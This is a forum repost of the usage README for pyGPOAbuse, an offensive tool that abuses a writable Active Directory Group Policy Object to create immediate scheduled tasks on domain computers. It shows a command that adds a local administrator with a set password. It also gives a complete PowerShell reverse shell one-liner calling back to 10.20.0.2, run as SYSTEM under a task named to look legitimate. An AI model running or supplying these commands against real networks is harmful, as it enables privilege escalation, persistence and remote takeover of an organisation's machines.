pyGPOAbuse - Partial Python Implementation Of SharpGPOAbuse

AVvXsEiIsxrP6JFy-eHuQ2NmbSK9M3bnxQI6dMOcrZoH2_L4K2iDNMOgg_SYHlUyI3lWB6s92BcqgvSP39sLIOGnTgwzFg1UgFj3M0O9br2z3so_P4KngmioQEURu-nArypXCxa55VOQ--_XR90mrko2FSBnxaQJKfCcS7xHxVgxFgV15GoYdoiqbzaHJ_Ro2r0f=w640-h272
Python partial implementation of SharpGPOAbuse by@pkb1s
This tool can be used when a controlled account can modify an existing GPO that applies to one or more users & computers. It will create an immediate scheduled task as SYSTEM on the remote computer for computer GPO, or as logged in user for user GPO.
Default behavior adds a local administrator.

How to use​

Basic usage​

Add john user to local administrators group (Password: H4x00r123..)
./pygpoabuse.py DOMAIN/user -hashes lm:nt -gpo-id "12345677-ABCD-9876-ABCD-123456789012"

Advanced usage​

Reverse shell example
코드:
./pygpoabuse.py DOMAIN/user -hashes lm:nt -gpo-id "12345677-ABCD-9876-ABCD-123456789012" \ 
    -powershell \ 
    -command "\$client = New-Object System.Net.Sockets.TCPClient('10.20.0.2',1234);\$stream = \$client.GetStream();[byte[]]\$bytes = 0..65535|%{0};while((\$i = \$stream.Read(\$bytes, 0, \$bytes.Length)) -ne 0){;\$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString(\$bytes,0, \$i);\$sendback = (iex \$data 2>&1 | Out-String );\$sendback2 = \$sendback + 'PS ' + (pwd).Path + '> ';\$sendbyte = ([text.encoding]::ASCII).GetBytes(\$sendback2);\$stream.Write(\$sendbyte,0,\$sendbyte.Length);\$stream.Flush()};\$client.Close()" \ 
    -taskname "Completely Legit Task" \
    -description "Dis is legit, pliz no delete" \ 
    -user

Credits​

  • @pkb1s for SharpGPOAbuse
  • @airman604 for schtask_now.py
  • @SkelSec for msldap
 
뒤로
상단